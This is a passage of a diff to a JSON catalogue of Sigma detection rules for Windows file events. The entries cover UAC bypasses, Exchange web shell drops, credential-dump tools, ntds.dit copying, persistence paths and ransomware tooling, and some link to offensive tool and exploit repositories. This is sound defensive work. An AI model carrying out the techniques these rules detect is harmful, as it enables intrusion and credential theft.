"RipZip Attack on Startup Folder" + }, + { + "description": "Detects the use of Advanced IP Scanner. Seems to be a popular tool for ransomware groups.", + "meta": { + "author": "@ROxPinTeddy", + "creation_date": "2020/05/12", + "falsepositive": [ + "Legitimate administrative use" + ], + "filename": "file_event_win_advanced_ip_scanner.yml", "level": "medium", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ - "https://isc.sans.edu/forums/diary/Desktopini+as+a+postexploitation+tool/25912/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_desktop_ini.yml" + "https://www.fireeye.com/blog/threat-research/2020/05/tactics-techniques-procedures-associated-with-maze-ransomware-incidents.html", + "https://news.sophos.com/en-us/2019/12/09/snatch-ransomware-reboots-pcs-into-safe-mode-to-bypass-protection/", + "https://assets.documentcloud.org/documents/20444693/fbi-pin-egregor-ransomware-bc-01062021.pdf", + "https://thedfirreport.com/2021/01/18/all-that-for-a-coinminer", + "https://labs.f-secure.com/blog/prelude-to-ransomware-systembc", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_advanced_ip_scanner.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1046" + ] + }, + "uuid": "fed85bf9-e075-4280-9159-fbe8a023d6fa", + "value": "Advanced IP Scanner - File Event" + }, + { + "description": "Detects creation of a file named \"ErrorHandler.cmd\" in the \"C:\\WINDOWS\\Setup\\Scripts\\\" directory which could be used as a method of persistence\nThe content of C:\\WINDOWS\\Setup\\Scripts\\ErrorHandler.cmd is read whenever some tools under C:\\WINDOWS\\System32\\oobe\\ (e.g. Setup.exe) fail to run for any reason.\n", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/08/09", + "falsepositive": [ + "Unknown" + ], + "filename": "file_event_win_error_handler_cmd_persistence.yml", + "level": "medium", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://www.hexacorn.com/blog/2022/01/16/beyond-good-ol-run-key-part-135/", + "https://github.com/last-byte/PersistenceSniper", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_error_handler_cmd_persistence.yml" + ], + "tags": [ + "attack.persistence" + ] + }, + "uuid": "15904280-565c-4b73-9303-3291f964e7f9", + "value": "Potential Persistence Attempt Via ErrorHandler.Cmd" + }, + { + "description": "Detects the pattern of UAC Bypass using Windows Media Player osksupport.dll (UACMe 32)", + "meta": { + "author": "Christian Burkard", + "creation_date": "2021/08/23", + "falsepositive": [ + "Unknown" + ], + "filename": "file_event_win_uac_bypass_wmp.yml", + "level": "high", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://github.com/hfiref0x/UACME", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_uac_bypass_wmp.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" + ] + }, + "uuid": "68578b43-65df-4f81-9a9b-92f32711a951", + "value": "UAC Bypass Using Windows Media Player - File" + }, + { + "description": "Detects the creation of known powershell scripts for exploitation", + "meta": { + "author": "Markus Neis, Nasreddine Bencherchali, Mustafa Kaan Demir, Georg Lauenstein", + "creation_date": "2018/04/07", + "falsepositive": [ + "Unknown" + ], + "filename": "file_event_win_powershell_exploit_scripts.yml", + "level": "high", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://github.com/nettitude/Invoke-PowerThIEf", + "https://unit42.paloaltonetworks.com/threat-assessment-black-basta-ransomware/", + "https://github.com/CsEnox/EventViewer-UACBypass", + "https://github.com/S3cur3Th1sSh1t/WinPwn", + "https://github.com/xorrior/RandomPS-Scripts/blob/848c919bfce4e2d67b626cbcf4404341cfe3d3b6/Get-DXWebcamVideo.ps1", + "https://github.com/BC-SECURITY/Invoke-ZeroLogon/blob/111d17c7fec486d9bb23387e2e828b09a26075e4/Invoke-ZeroLogon.ps1", + "https://github.com/dafthack/DomainPasswordSpray/blob/b13d64a5834694aa73fd2aea9911a83027c465a7/DomainPasswordSpray.ps1", + "https://github.com/S3cur3Th1sSh1t/PowerSharpPack/tree/master/PowerSharpBinaries", + "https://github.com/NetSPI/PowerUpSQL", + "https://research.nccgroup.com/2022/06/06/shining-the-light-on-black-basta/", + "https://github.com/rvrsh3ll/Misc-Powershell-Scripts/blob/6f23bb41f9675d7e2d32bacccff75e931ae00554/OfficeMemScraper.ps1", + "https://github.com/AlsidOfficial/WSUSpendu/", + "https://github.com/PowerShellMafia/PowerSploit", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_powershell_exploit_scripts.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "f331aa1f-8c53-4fc3-b083-cc159bc971cb", + "value": "Malicious PowerShell Commandlets - FileCreation" + }, + { + "description": "Detects suspicious file type dropped by an Exchange component in IIS", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/10/04", + "falsepositive": [ + "Unknown" + ], + "filename": "file_event_win_exchange_webshell_drop_suspicious.yml", + "level": "medium", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://www.gteltsc.vn/blog/canh-bao-chien-dich-tan-cong-su-dung-lo-hong-zero-day-tren-microsoft-exchange-server-12714.html", + "https://www.microsoft.com/security/blog/2022/09/30/analyzing-attacks-using-the-exchange-vulnerabilities-cve-2022-41040-and-cve-2022-41082/", + "https://en.gteltsc.vn/blog/cap-nhat-nhe-ve-lo-hong-bao-mat-0day-microsoft-exchange-dang-duoc-su-dung-de-tan-cong-cac-to-chuc-tai-viet-nam-9685.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_exchange_webshell_drop_suspicious.yml" ], "tags": [ "attack.persistence", - "attack.t1547.009" + "attack.t1190", + "attack.initial_access", + "attack.t1505.003" ] }, - "uuid": "81315b50-6b60-4d8f-9928-3466e1022515", - "value": "Suspicious desktop.ini Action" - }, - { - "description": "Ransomware create txt file in the user Desktop", - "meta": { - "author": "frack113", - "creation_date": "2021/12/26", - "falsepositive": [ - "Unknown" - ], - "filename": "file_event_win_susp_desktop_txt.yml", - "level": "high", - "logsource.category": "file_event", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1486/T1486.md#atomic-test-5---purelocker-ransom-note", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_desktop_txt.yml" - ], - "tags": [ - "attack.impact", - "attack.t1486" - ] - }, - "uuid": "caf02a0a-1e1c-4552-9b48-5e070bd88d11", - "value": "Suspicious Creation TXT File in User Desktop" - }, - { - "description": "Detects the creation of diagcab file, which could be caused by some legitimate installer or is a sign of exploitation (review the filename and its location)", - "meta": { - "author": "frack113", - "creation_date": "2022/06/08", - "falsepositive": [ - "Legitimate microsoft diagcab" - ], - "filename": "file_event_win_susp_diagcab.yml", - "level": "medium", - "logsource.category": "file_event", - "logsource.product": "windows", - "refs": [ - "https://threadreaderapp.com/thread/1533879688141086720.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_diagcab.yml" - ], - "tags": [ - "attack.resource_development" - ] - }, - "uuid": "3d0ed417-3d94-4963-a562-4a92c940656a", - "value": "Creation of a Diagcab" - }, - { - "description": "Detects dropped files with double extensions, which is often used by malware as a method to abuse the fact that windows hide default extensions by default.", - "meta": { - "author": "Nasreddine Bencherchali, frack113", - "creation_date": "2022/06/19", - "falsepositive": [ - "Unlikely" - ], - "filename": "file_event_win_susp_double_extension.yml", - "level": "high", - "logsource.category": "file_event", - "logsource.product": "windows", - "refs": [ - "https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-june-mustang-panda/", - "https://www.anomali.com/blog/china-based-apt-mustang-panda-targets-minority-groups-public-and-private-sector-organizations", - "https://www.cybereason.com/blog/research/a-bazar-of-tricks-following-team9s-development-cycles", - "https://twitter.com/malwrhunterteam/status/1235135745611960321", - "https://twitter.com/luc4m/status/1073181154126254080", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_double_extension.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1036.007" - ] - }, - "uuid": "b4926b47-a9d7-434c-b3a0-adc3fa0bd13e", - "value": "Suspicious Double Extension Files" - }, - { - "description": "Detects the creation of an executable by another executable", - "meta": { - "author": "frack113", - "creation_date": "2022/03/09", - "falsepositive": [ - "Software installers", - "Update utilities" - ], - "filename": "file_event_win_susp_dropper.yml", - "level": "low", - "logsource.category": "file_event", - "logsource.product": "windows", - "refs": [ - "Malware Sandbox", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_dropper.yml" - ], - "tags": [ - "attack.resource_development", - "attack.t1587.001" - ] - }, - "uuid": "297afac9-5d02-4138-8c58-b977bac60556", - "value": "Creation of an Executable by an Executable" + "uuid": "6b269392-9eba-40b5-acb6-55c882b20ba6", + "value": "Suspicious File Drop by Exchange" }, { "description": "Detects suspicious activity in which the MSExchangeMailboxReplication process writes .asp and .apsx files to disk, which could be a sign of ProxyShell exploitation", @@ -24247,135 +25217,81 @@ "value": "Suspicious MSExchangeMailboxReplication ASPX Write" }, { - "description": "Detect creation of suspicious executable file name. Some strings look for suspicious file extensions, others look for filenames that exploit unquoted service paths.", - "meta": { - "author": "frack113", - "creation_date": "2022/09/05", - "falsepositive": [ - "Unknown" - ], - "filename": "file_event_win_susp_executable_creation.yml", - "level": "high", - "logsource.category": "file_event", - "logsource.product": "windows", - "refs": [ - "https://medium.com/@SumitVerma101/windows-privilege-escalation-part-1-unquoted-service-path-c7a011a8d8ae", - "https://app.any.run/tasks/76c69e2d-01e8-49d9-9aea-fb7cc0c4d3ad/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_executable_creation.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1564" - ] - }, - "uuid": "74babdd6-a758-4549-9632-26535279e654", - "value": "Suspicious Executable File Creation" - }, - { - "description": "Get-Variable is a valid PowerShell cmdlet\nWindowsApps is by default in the path where PowerShell is executed.\nSo when the Get-Variable command is issued on PowerShell execution, the system first looks for the Get-Variable executable in the path and executes the malicious binary instead of looking for the PowerShell cmdlet.\n", - "meta": { - "author": "frack113", - "creation_date": "2022/04/23", - "falsepositive": [ - "Unknown" - ], - "filename": "file_event_win_susp_get_variable.yml", - "level": "high", - "logsource.category": "file_event", - "logsource.product": "windows", - "refs": [ - "https://blog.malwarebytes.com/threat-intelligence/2022/04/colibri-loader-combines-task-scheduler-and-powershell-in-clever-persistence-technique/", - "https://www.joesandbox.com/analysis/465533/0/html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_get_variable.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1546", - "attack.defense_evasion", - "attack.t1027" - ] - }, - "uuid": "0c3fac91-5627-46e8-a6a8-a0d7b9b8ae1b", - "value": "Suspicious Get-Variable.exe Creation" - }, - { - "description": "Detects dropped files with LNK double extension, which is often used by malware as a method to abuse the fact that windows hide default extensions by default.", - "meta": { - "author": "Nasreddine Bencherchali, frack113", - "creation_date": "2022/11/07", - "falsepositive": [ - "Users creating a shortcut on e.g. desktop" - ], - "filename": "file_event_win_susp_lnk_double_extension.yml", - "level": "medium", - "logsource.category": "file_event", - "logsource.product": "windows", - "refs": [ - "https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-june-mustang-panda/", - "https://www.anomali.com/blog/china-based-apt-mustang-panda-targets-minority-groups-public-and-private-sector-organizations", - "https://www.cybereason.com/blog/research/a-bazar-of-tricks-following-team9s-development-cycles", - "https://twitter.com/malwrhunterteam/status/1235135745611960321", - "https://twitter.com/luc4m/status/1073181154126254080", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_lnk_double_extension.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1036.007" - ] - }, - "uuid": "3215aa19-f060-4332-86d5-5602511f3ca8", - "value": "Suspicious LNK Double Extension Files" - }, - { - "description": "Detects suspicious processes that write (copy) a Active Directory database (ntds.dit) file", - "meta": { - "author": "Florian Roth", - "creation_date": "2022/01/11", - "falsepositive": [ - "Unknown" - ], - "filename": "file_event_win_susp_ntds_dit.yml", - "level": "high", - "logsource.category": "file_event", - "logsource.product": "windows", - "refs": [ - "https://stealthbits.com/blog/extracting-password-hashes-from-the-ntds-dit-file/", - "https://adsecurity.org/?p=2398", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_ntds_dit.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1003.002", - "attack.t1003.003" - ] - }, - "uuid": "11b1ed55-154d-4e82-8ad7-83739298f720", - "value": "Suspicious Process Writes Ntds.dit" - }, - { - "description": "A general detection for processes creating PFX files. This could be an indicator of an adversary exporting a local certificate to a PFX file.", + "description": "Detects processes creating temp files related to PCRE.NET package", "meta": { "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", - "creation_date": "2020/05/02", + "creation_date": "2020/10/29", "falsepositive": [ - "System administrators managing certififcates." + "Unknown" ], - "filename": "file_event_win_susp_pfx_file_creation.yml", - "level": "medium", + "filename": "file_event_win_pcre_net_temp_file.yml", + "level": "high", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ - "https://github.com/OTRF/detection-hackathon-apt29/issues/14", - "https://threathunterplaybook.com/evals/apt29/detections/6.B.1_6392C9F1-D975-4F75-8A70-433DEDD7F622.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_pfx_file_creation.yml" + "https://twitter.com/tifkin_/status/1321916444557365248", + "https://twitter.com/rbmaslen/status/1321859647091970051", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_pcre_net_temp_file.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059" + ] + }, + "uuid": "6e90ae7a-7cd3-473f-a035-4ebb72d961da", + "value": "PCRE.NET Package Temp Files" + }, + { + "description": "Detects the creation of an executable with a system process name in folders other than the system ones (System32, SysWOW64...etc).", + "meta": { + "author": "Sander Wiebing, Tim Shelton, Nasreddine Bencherchali", + "creation_date": "2020/05/26", + "falsepositive": [ + "System processes copied outside their default folders for testing purposes", + "Third party software naming their software with the same names as the processes mentioned here" + ], + "filename": "file_event_win_creation_system_file.yml", + "level": "high", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_creation_system_file.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1036.005" + ] + }, + "uuid": "d5866ddf-ce8f-4aea-b28e-d96485a20d3d", + "value": "Files With System Process Name In Unsuspected Locations" + }, + { + "description": "Files with well-known filenames (parts of credential dump software or files produced by them) creation", + "meta": { + "author": "Teymur Kheirkhabarov, oscd.community", + "creation_date": "2019/11/01", + "falsepositive": [ + "Legitimate Administrator using tool for password recovery" + ], + "filename": "file_event_win_cred_dump_tools_dropped_files.yml", + "level": "high", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_cred_dump_tools_dropped_files.yml" ], "tags": [ "attack.credential_access", - "attack.t1552.004" + "attack.t1003.001", + "attack.t1003.002", + "attack.t1003.003", + "attack.t1003.004", + "attack.t1003.005" ] }, - "uuid": "dca1b3e8-e043-4ec8-85d7-867f334b5724", - "value": "Suspicious PFX File Creation" + "uuid": "8fbf3271-1ef6-4e94-8210-03c2317947f6", + "value": "Cred Dump Tools Dropped Files" }, { "description": "Detects the creation or modification of a powershell profile which could indicate suspicious activity as the profile can be used as a mean of persistence", @@ -24383,15 +25299,15 @@ "author": "HieuTT35, Nasreddine Bencherchali", "creation_date": "2019/10/24", "falsepositive": [ - "System administrator create Powershell profile manually" + "System administrator creating Powershell profile manually" ], "filename": "file_event_win_susp_powershell_profile.yml", "level": "high", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ - "https://www.welivesecurity.com/2019/05/29/turla-powershell-usage/", "https://persistence-info.github.io/Data/powershellprofile.html", + "https://www.welivesecurity.com/2019/05/29/turla-powershell-usage/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_powershell_profile.yml" ], "tags": [ @@ -24404,269 +25320,28 @@ "value": "PowerShell Profile Modification" }, { - "description": "Detects the creation of the PROCEXP152.sys file in the application-data local temporary folder.\nThis driver is used by Sysinternals Process Explorer but also by KDU (https://github.com/hfiref0x/KDU) or Ghost-In-The-Logs (https://github.com/bats3c/Ghost-In-The-Logs), which uses KDU.\n", - "meta": { - "author": "xknow (@xknow_infosec), xorxes (@xor_xes)", - "creation_date": "2019/04/08", - "falsepositive": [ - "Other legimate tools using this driver and filename (like Sysinternals). Note - Clever attackers may easily bypass this detection by just renaming the driver filename. Therefore just Medium-level and don't rely on it." - ], - "filename": "file_event_win_susp_procexplorer_driver_created_in_tmp_folder.yml", - "level": "medium", - "logsource.category": "file_event", - "logsource.product": "windows", - "refs": [ - "https://blog.dylan.codes/evading-sysmon-and-windows-event-logging/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_procexplorer_driver_created_in_tmp_folder.yml" - ], - "tags": [ - "attack.t1562.001", - "attack.defense_evasion" - ] - }, - "uuid": "3da70954-0f2c-4103-adff-b7440368f50e", - "value": "Suspicious PROCEXP152.sys File Created In TMP" - }, - { - "description": "Detects the creation of suspcious binary files inside the \"\\windows\\system32\\spool\\drivers\\color\\\" as seen in the blog referenced below", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/07/28", - "falsepositive": [ - "Unknown" - ], - "filename": "file_event_win_susp_spool_drivers_color_drop.yml", - "level": "medium", - "logsource.category": "file_event", - "logsource.product": "windows", - "refs": [ - "https://www.microsoft.com/security/blog/2022/07/27/untangling-knotweed-european-private-sector-offensive-actor-using-0-day-exploits/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_spool_drivers_color_drop.yml" - ], - "tags": [ - "attack.defense_evasion" - ] - }, - "uuid": "ce7066a6-508a-42d3-995b-2952c65dc2ce", - "value": "Drop Binaries Into Spool Drivers Color Folder" - }, - { - "description": "Detects when a file with a suspicious extension is created in the startup folder", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/08/10", - "falsepositive": [ - "Rare legitimate usage of some of the extensions mentioned in the rule" - ], - "filename": "file_event_win_susp_startup_folder_persistence.yml", - "level": "high", - "logsource.category": "file_event", - "logsource.product": "windows", - "refs": [ - "https://github.com/last-byte/PersistenceSniper", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_startup_folder_persistence.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1547.001" - ] - }, - "uuid": "28208707-fe31-437f-9a7f-4b1108b94d2e", - "value": "Suspicious Startup Folder Persistence" - }, - { - "description": "Detects the creation of files that indicator an interactive use of PowerShell in the SYSTEM user context", - "meta": { - "author": "Florian Roth", - "creation_date": "2021/12/07", - "falsepositive": [ - "Administrative activity", - "PowerShell scripts running as SYSTEM user" - ], - "filename": "file_event_win_susp_system_interactive_powershell.yml", - "level": "high", - "logsource.category": "file_event", - "logsource.product": "windows", - "refs": [ - "https://jpcertcc.github.io/ToolAnalysisResultSheet/details/PowerSploit_Invoke-Mimikatz.htm", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_system_interactive_powershell.yml" - ], - "tags": "No established tags" - }, - "uuid": "5b40a734-99b6-4b98-a1d0-1cea51a08ab2", - "value": "Suspicious Interactive PowerShell as SYSTEM" - }, - { - "description": "Detects the creation of tasks from processes executed from suspicious locations", - "meta": { - "author": "Florian Roth", - "creation_date": "2021/11/16", - "falsepositive": [ - "Unknown" - ], - "filename": "file_event_win_susp_task_write.yml", - "level": "high", - "logsource.category": "file_event", - "logsource.product": "windows", - "refs": [ - "Internal Research", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_task_write.yml" - ], - "tags": [ - "attack.persistence", - "attack.execution", - "attack.t1053" - ] - }, - "uuid": "80e1f67a-4596-4351-98f5-a9c3efabac95", - "value": "Suspicious Scheduled Task Write to System32 Tasks" - }, - { - "description": "Detects the creation of log files during a TeamViewer remote session", - "meta": { - "author": "Florian Roth", - "creation_date": "2022/01/30", - "falsepositive": [ - "Legitimate uses of TeamViewer in an organisation" - ], - "filename": "file_event_win_susp_teamviewer_remote_session.yml", - "level": "medium", - "logsource.category": "file_event", - "logsource.product": "windows", - "refs": [ - "https://www.teamviewer.com/en-us/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_teamviewer_remote_session.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1219" - ] - }, - "uuid": "162ab1e4-6874-4564-853c-53ec3ab8be01", - "value": "TeamViewer Remote Session" - }, - { - "description": "Detects the creation or modification of a vscode related powershell profile which could indicate suspicious activity as the profile can be used as a mean of persistence", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/08/24", - "falsepositive": [ - "Legitimate use of the profile by developers or administrators" - ], - "filename": "file_event_win_susp_vscode_powershell_profile.yml", - "level": "high", - "logsource.category": "file_event", - "logsource.product": "windows", - "refs": [ - "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_profiles?view=powershell-7.2", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_vscode_powershell_profile.yml" - ], - "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "attack.t1546.013" - ] - }, - "uuid": "3a9fa2ec-30bc-4ebd-b49e-7c9cff225502", - "value": "VsCode Powershell Profile Modification" - }, - { - "description": "Detects the creation of an file in user Word Startup", + "description": "TeamViewer_Desktop.exe is create during install", "meta": { "author": "frack113", - "creation_date": "2022/06/05", + "creation_date": "2022/01/28", "falsepositive": [ - "Addition of legitimate plugins" + "Unknown" ], - "filename": "file_event_win_susp_winword_startup.yml", + "filename": "file_event_win_install_teamviewer_desktop.yml", "level": "medium", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ - "Malware Sandbox https://app.any.run/tasks/d6fe6624-6ef8-485d-aa75-3d1bdda2a08c/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_winword_startup.yml" - ], - "tags": [ - "attack.resource_development", - "attack.t1587.001" - ] - }, - "uuid": "a10a2c40-2c4d-49f8-b557-1a946bc55d9d", - "value": "Creation In User Word Startup Folder" - }, - { - "description": "Detects default PsExec service filename which indicates PsExec service installation and execution", - "meta": { - "author": "Thomas Patzke", - "creation_date": "2017/06/12", - "falsepositive": [ - "Unknown" - ], - "filename": "file_event_win_tool_psexec.yml", - "level": "low", - "logsource.category": "file_event", - "logsource.product": "windows", - "refs": [ - "https://www.jpcert.or.jp/english/pub/sr/ir_research.html", - "https://jpcertcc.github.io/ToolAnalysisResultSheet", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_tool_psexec.yml" - ], - "tags": [ - "attack.execution", - "attack.t1569.002", - "attack.s0029" - ] - }, - "uuid": "259e5a6a-b8d2-4c38-86e2-26c5e651361d", - "value": "PsExec Service File Creation" - }, - { - "description": "Detects the usage of tsclient share to place a backdoor on the RDP source machine's startup folder", - "meta": { - "author": "Samir Bousseaden", - "creation_date": "2019/02/21", - "falsepositive": [ - "Unlikely" - ], - "filename": "file_event_win_tsclient_filewrite_startup.yml", - "level": "high", - "logsource.category": "file_event", - "logsource.product": "windows", - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_tsclient_filewrite_startup.yml" + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-1---teamviewer-files-detected-test-on-windows", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_install_teamviewer_desktop.yml" ], "tags": [ "attack.command_and_control", "attack.t1219" ] }, - "uuid": "52753ea4-b3a0-4365-910d-36cff487b789", - "value": "Hijack Legit RDP Session to Move Laterally" - }, - { - "description": "Detects the pattern of UAC Bypass using consent.exe and comctl32.dll (UACMe 22)", - "meta": { - "author": "Christian Burkard", - "creation_date": "2021/08/23", - "falsepositive": [ - "Unknown" - ], - "filename": "file_event_win_uac_bypass_consent_comctl32.yml", - "level": "high", - "logsource.category": "file_event", - "logsource.product": "windows", - "refs": [ - "https://github.com/hfiref0x/UACME", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_uac_bypass_consent_comctl32.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" - ] - }, - "uuid": "62ed5b55-f991-406a-85d9-e8e8fdf18789", - "value": "UAC Bypass Using Consent and Comctl32 - File" + "uuid": "9711de76-5d4f-4c50-a94f-21e4e8f8384d", + "value": "Installation of TeamViewer Desktop" }, { "description": "Detects the pattern of UAC Bypass using .NET Code Profiler and mmc.exe DLL hijacking (UACMe 39)", @@ -24693,6 +25368,252 @@ "uuid": "93a19907-d4f9-4deb-9f91-aac4692776a6", "value": "UAC Bypass Using .NET Code Profiler on MMC" }, + { + "description": "Detects the creation of \"msiexec.exe\" in the \"bin\" directory of the ManageEngine SupportCenter Plus (Related to CVE-2021-44077) and public POC available (See references section)", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/06/06", + "falsepositive": [ + "Unlikely" + ], + "filename": "file_event_win_cve_2021_44077_poc_default_files.yml", + "level": "high", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://thedfirreport.com/2022/06/06/will-the-real-msiexec-please-stand-up-exploit-leads-to-data-exfiltration/", + "https://github.com/horizon3ai/CVE-2021-44077/blob/b7a48e25824e8ead95e028475c7fd0e107e6e6bf/exploit.py", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_cve_2021_44077_poc_default_files.yml" + ], + "tags": [ + "attack.execution", + "cve.2021.44077" + ] + }, + "uuid": "7b501acf-fa98-4272-aa39-194f82edc8a3", + "value": "CVE-2021-44077 POC Default Dropped File" + }, + { + "description": "Detects file writes of WMI script event consumer", + "meta": { + "author": "Thomas Patzke", + "creation_date": "2018/03/07", + "falsepositive": [ + "Dell Power Manager (C:\\Program Files\\Dell\\PowerManager\\DpmPowerPlanSetup.exe)" + ], + "filename": "file_event_win_wmi_persistence_script_event_consumer_write.yml", + "level": "high", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://www.eideon.com/2018-03-02-THL03-WMIBackdoors/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_wmi_persistence_script_event_consumer_write.yml" + ], + "tags": [ + "attack.t1546.003", + "attack.persistence" + ] + }, + "uuid": "33f41cdd-35ac-4ba8-814b-c6a4244a1ad4", + "value": "WMI Persistence - Script Event Consumer File Write" + }, + { + "description": "Detects potential DLL hijack of \"iertutil.dll\" found in the DCOM InternetExplorer.Application Class over the network", + "meta": { + "author": "Roberto Rodriguez @Cyb3rWard0g, Open Threat Research (OTR), wagga", + "creation_date": "2020/10/12", + "falsepositive": [ + "Unknown" + ], + "filename": "file_event_win_dcom_iertutil_dll_hijack.yml", + "level": "critical", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://threathunterplaybook.com/hunts/windows/201009-RemoteDCOMIErtUtilDLLHijack/notebook.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_dcom_iertutil_dll_hijack.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.t1021.002", + "attack.t1021.003" + ] + }, + "uuid": "2f7979ae-f82b-45af-ac1d-2b10e93b0baa", + "value": "Potential DCOM InternetExplorer.Application DLL Hijack" + }, + { + "description": "Detects unusual processes accessing desktop.ini, which can be leveraged to alter how Explorer displays a folder's content (i.e. renaming files) without changing them on disk.", + "meta": { + "author": "Maxime Thiebaut (@0xThiebaut), Tim Shelton (HAWK.IO)", + "creation_date": "2020/03/19", + "falsepositive": [ + "Operations performed through Windows SCCM or equivalent", + "Read only access list authority" + ], + "filename": "file_event_win_susp_desktop_ini.yml", + "level": "medium", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://isc.sans.edu/forums/diary/Desktopini+as+a+postexploitation+tool/25912/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_desktop_ini.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1547.009" + ] + }, + "uuid": "81315b50-6b60-4d8f-9928-3466e1022515", + "value": "Suspicious desktop.ini Action" + }, + { + "description": "Detects the creation of suspcious binary files inside the \"\\windows\\system32\\spool\\drivers\\color\\\" as seen in the blog referenced below", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/07/28", + "falsepositive": [ + "Unknown" + ], + "filename": "file_event_win_susp_spool_drivers_color_drop.yml", + "level": "medium", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://www.microsoft.com/security/blog/2022/07/27/untangling-knotweed-european-private-sector-offensive-actor-using-0-day-exploits/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_spool_drivers_color_drop.yml" + ], + "tags": [ + 